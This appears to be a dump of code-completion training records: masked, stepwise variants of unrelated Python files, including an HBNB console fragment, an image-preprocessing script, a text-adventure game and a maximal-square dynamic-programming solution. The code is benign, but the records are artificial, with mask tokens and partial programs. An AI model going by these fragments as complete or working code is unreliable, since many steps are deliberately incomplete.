dict_classes[get_inst].__dict__[arg_line[2]] = arg_line[3]\n dict_classes[get_inst].save()\n else:\n print(\"** no instance found **\")\n\n def default(self, line):\n '''all method names that aren't defined'''\n args_line = line.split('.')\n if len(args_line) > 1:\n if args_line[1] == \"all()\":\n self.do_all(args_line[0])\n if args_line[1] == \"count()\":\n self.do_count(args_line[0])\n\n my_count = args_line[1].split('\"')\n res = re.findall(r'\\(.*?\\)', args_line[1])\n my_count[0] = my_count[0] + line[-1]\n if my_count[0] == \"show()\":\n myNewList = [args_line[0], my_count[1]]\n self.do_show(myNewList)\n else:\n cmd.Cmd.default(self, line)\n\n def check_if_created(self, arg_line, len_args):\n '''Verifies if class exists'''\n if len_args == 0:\n print(\"** class name missing **\")\n return 1\n elif arg_line[0] not in self.__DCT_CLS:\n print(\"** class doesn't exist **\")\n return 1\n elif (len_args == 1):\n print(\"** instance id missing **\")\n return 1\n\n def do_count(self, line):\n '''Counts the number of existing instances'''\n arg_line = line.split()\n if line == \"\" or arg_line[0] in self.__DCT_CLS:\n dir_classes = models.storage.all()\n list_classes = []\n count = 0\n for key, value in dir_classes.items():\n if line in key:\n list_classes.append(value.__str__())\n count += 1\n print(count)\n else:\n print(\"** class doesn't exist **\")\n\n\nif __name__ == \"__main__\":\n HBNBCommand().cmdloop()\n",
"step-ids": [
9,
11,
12,
16,
17
]
}
|
[
9,
11,
12,
16,
17
] |
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(img_size, interpolation=args.
interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,
std=args.std, crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, '===', i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)
) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str,
metavar='NAME', help=
'Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',
help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = 0.485, 0.456, 0.406
args.std = 0.229, 0.224, 0.225
args.input_size = 3, 224, 224
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import numpy as np
import torch
from timm.data.transforms_factory import transforms_imagenet_eval
from torchvision import transforms
from PIL import Image
def preprocess(args, src_path, save_path):
if isinstance(args.input_size, tuple):
img_size = args.input_size[-2:]
else:
img_size = args.input_size
preprocesser = transforms_imagenet_eval(
img_size,
interpolation=args.interpolation,
use_prefetcher=args.use_prefetcher,
mean=args.mean,
std=args.std,
crop_pct=args.crop_pct)
i = 0
in_files = os.listdir(src_path)
for file in in_files:
i = i + 1
print(file, "===", i)
input_image = Image.open(src_path + file).convert('RGB')
input_tensor = preprocesser(input_image)
img = np.array(input_tensor).astype(np.float32)
img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(
[x * 255 for x in args.std]).reshape(3, 1, 1)
img = img.astype(np.float32)
img.tofile(os.path.join(save_path, file.split('.')[0] + ".bin"))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--src_path', default='', type=str)
parser.add_argument('--save_path', default='', type=str)
parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',
help='Image resize interpolation type (overrides model)')
parser.add_argument('use_prefetcher', action='store_true', default=True,
help='enable fast prefetcher')
parser.add_argument('--crop-pct', default=0.9, type=float,
metavar='N', help='Input image center crop percent (for validation only)')
args = parser.parse_args()
args.mean = (0.485, 0.456, 0.406)
args.std = (0.229, 0.224, 0.225)
args.input_size = (3, 224, 224)
if not os.path.exists(args.save_path):
os.makedirs(args.save_path)
preprocess(args, args.src_path, args.save_path)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "443ed24ab396e83dbf12558207376258124bca8b",
"index": 4094,
"step-1": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n preprocesser = transforms_imagenet_eval(img_size, interpolation=args.\n interpolation, use_prefetcher=args.use_prefetcher, mean=args.mean,\n std=args.std, crop_pct=args.crop_pct)\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, '===', i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([(x * 255) for x in args.mean]).reshape(3, 1, 1)\n ) / np.array([(x * 255) for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + '.bin'))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str,\n metavar='NAME', help=\n 'Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float, metavar='N',\n help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = 0.485, 0.456, 0.406\n args.std = 0.229, 0.224, 0.225\n args.input_size = 3, 224, 224\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport os\nimport numpy as np\n\nimport torch\nfrom timm.data.transforms_factory import transforms_imagenet_eval\nfrom torchvision import transforms\nfrom PIL import Image\n\n\ndef preprocess(args, src_path, save_path):\n if isinstance(args.input_size, tuple):\n img_size = args.input_size[-2:]\n else:\n img_size = args.input_size\n\n preprocesser = transforms_imagenet_eval(\n img_size,\n interpolation=args.interpolation,\n use_prefetcher=args.use_prefetcher,\n mean=args.mean,\n std=args.std,\n crop_pct=args.crop_pct)\n\n i = 0\n in_files = os.listdir(src_path)\n for file in in_files:\n i = i + 1\n print(file, \"===\", i)\n input_image = Image.open(src_path + file).convert('RGB')\n input_tensor = preprocesser(input_image)\n img = np.array(input_tensor).astype(np.float32)\n img = (img - np.array([x * 255 for x in args.mean]).reshape(3, 1, 1)) / np.array(\n [x * 255 for x in args.std]).reshape(3, 1, 1)\n img = img.astype(np.float32)\n img.tofile(os.path.join(save_path, file.split('.')[0] + \".bin\"))\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--src_path', default='', type=str)\n parser.add_argument('--save_path', default='', type=str)\n parser.add_argument('--interpolation', default='bicubic', type=str, metavar='NAME',\n help='Image resize interpolation type (overrides model)')\n parser.add_argument('use_prefetcher', action='store_true', default=True,\n help='enable fast prefetcher')\n parser.add_argument('--crop-pct', default=0.9, type=float,\n metavar='N', help='Input image center crop percent (for validation only)')\n args = parser.parse_args()\n args.mean = (0.485, 0.456, 0.406)\n args.std = (0.229, 0.224, 0.225)\n args.input_size = (3, 224, 224)\n\n if not os.path.exists(args.save_path):\n os.makedirs(args.save_path)\n\n preprocess(args, args.src_path, args.save_path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from room import Room
from player import Player
from item import Item
# Declare all the rooms
items = {
'scimitar': Item('Scimitar', '+7 Attack'),
'mace': Item('Mace', '+13 Attack'),
'tower_shield': Item('Tower Shield', '+8 Block'),
'heraldic_shield': Item('Heraldic Shield', '+12 Block'),
'chainmail': Item('Chainmail', '+15 Defense'),
'gold_plate': Item('Gold Plate', '+25 Defense'),
'health_potion': Item('Health Potion', 'Heal 10 HP'),
'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),
'gold': Item('Gold', 'Currency for other items from vendors'),
'demon_heart': Item('Demon Heart', 'Bestows owner with great power')
}
room = {
'outside': Room("Outside Cave Entrance",
"""North of you, the cave mount beckons""",
[items['scimitar'], items['health_potion']]),
'foyer': Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east.""",
[items['tower_shield'], items['chainmail']]),
'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm.""",
[items['mace'], items['mana_potion']]),
'narrow': Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air.""",
[items['gold_plate'], items['heraldic_shield']]),
'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south.""",
[items['gold'], items['demon_heart']]),
}
# Link rooms together
room['outside'].n_to = room['foyer']
room['foyer'].s_to = room['outside']
room['foyer'].n_to = room['overlook']
room['foyer'].e_to = room['narrow']
room['overlook'].s_to = room['foyer']
room['narrow'].w_to = room['foyer']
room['narrow'].n_to = room['treasure']
room['treasure'].s_to = room['narrow']
# Main
player = Player(room['outside'])
suppressRoomPrint = False
while True:
if suppressRoomPrint:
suppressRoomPrint = False
else:
print (player.location)
print (f'\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n')
inp = input("What is your command: ")
if inp == "q":
break
if inp == "n" or inp == "s" or inp == "w" or inp == "e":
newRoom = player.location.getRoomInDirection(inp)
if newRoom == None:
print('\x1b[1;37;41m + \nImpossible, try again.\n\x1b[0m')
suppressRoomPrint = True
else:
player.change_location(newRoom)
|
normal
|
{
"blob_id": "07a172c28057dc803efdbdc10a9e2e11df4e527b",
"index": 3134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-3": "<mask token>\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-4": "from room import Room\nfrom player import Player\nfrom item import Item\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-5": "from room import Room\nfrom player import Player\nfrom item import Item\n# Declare all the rooms\nitems = {\n 'scimitar': Item('Scimitar', '+7 Attack'),\n 'mace': Item('Mace', '+13 Attack'),\n 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'),\n 'chainmail': Item('Chainmail', '+15 Defense'),\n 'gold_plate': Item('Gold Plate', '+25 Defense'),\n 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),\n 'gold': Item('Gold', 'Currency for other items from vendors'),\n 'demon_heart': Item('Demon Heart', 'Bestows owner with great power')\n}\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"\"\"North of you, the cave mount beckons\"\"\",\n [items['scimitar'], items['health_potion']]),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\",\n[items['tower_shield'], items['chainmail']]),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n[items['mace'], items['mana_potion']]),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\",\n[items['gold_plate'], items['heraldic_shield']]),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\",\n[items['gold'], items['demon_heart']]),\n}\n\n# Link rooms together\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n# Main\n\nplayer = Player(room['outside'])\n\nsuppressRoomPrint = False\n\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print (player.location)\n print (f'\\n{player.location.name}\\n {player.location.description}\\n {player.location.getItems()}\\n')\n inp = input(\"What is your command: \")\n\n if inp == \"q\":\n break\n if inp == \"n\" or inp == \"s\" or inp == \"w\" or inp == \"e\":\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Given a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.
Example:
Input:
1 0 1 0 0
1 0 1 1 1
1 1 1 1 1
1 0 0 1 0
Output: 4
"""
# 196ms. 98 percentile
class Solution:
def maximalSquare(self, matrix: List[List[str]]) -> int:
if not matrix:
return 0
dp = [0]*(len(matrix[0]) + 1)
longestSide = 0
for i in range(len(matrix)):
prevSquare =0
for j in range(len(matrix[0])):
temp = dp[j]
if matrix[i][j] == '1':
dp[j] = 1 + min(dp[j], dp[j-1], prevSquare)
longestSide = max(longestSide, dp[j])
else:
dp[j] = 0
prevSquare = temp
return longestSide*longestSide
"""
Notes:
Two hard things in this problem. The first is the logic for the dp, although after the fact
it seems pretty straightforward imo.
At any element you can check if you have a 2 by 2 square by looking at its neighbors. So anywhere you see
1 1
1 1
you're going to replace the bottom right corner with a 2. Note we're going top down and left to right...
So if you see
2 2
2 1
...then you know that you actually have
1 1 1
1 2 2
1 2 1
meaning you can actually put 3 in the corner.
On the other hand, if any of the neighbors are 1's, then you won't have the full cube. Implying that
at each spot, if it's a 1, you take the min of the three neighbors + 1.
The second hard thing is just dealing with the fact the input is characters not ints...annoying imo. The second
solution up there just uses a standard 1d dp array to keep track of the last row processed in terms of ints...which
is all we need. So we can avoid casting anything.
The first solution only casts the first first row and the first column.
Most of it is straightforwards. The one thing I want to note is that temp variable switch. Basically because our dp is
a single array, when we're processing element i, we've already replaced element i-1 with an updated value. That's a problem
because the i-1 value represents the j-1,i-1 value for the ith element in the dp. So we use that little temp switch to
skirt the issue.
"""
|
normal
|
{
"blob_id": "e5d31a2ea4a8615d24626be2414f5ae49b9cd6a1",
"index": 184,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def maximalSquare(self, matrix: List[List[str]]) ->int:\n if not matrix:\n return 0\n dp = [0] * (len(matrix[0]) + 1)\n longestSide = 0\n for i in range(len(matrix)):\n prevSquare = 0\n for j in range(len(matrix[0])):\n temp = dp[j]\n if matrix[i][j] == '1':\n dp[j] = 1 + min(dp[j], dp[j - 1], prevSquare)\n longestSide = max(longestSide, dp[j])\n else:\n dp[j] = 0\n prevSquare = temp\n return longestSide * longestSide\n\n\n<mask token>\n",
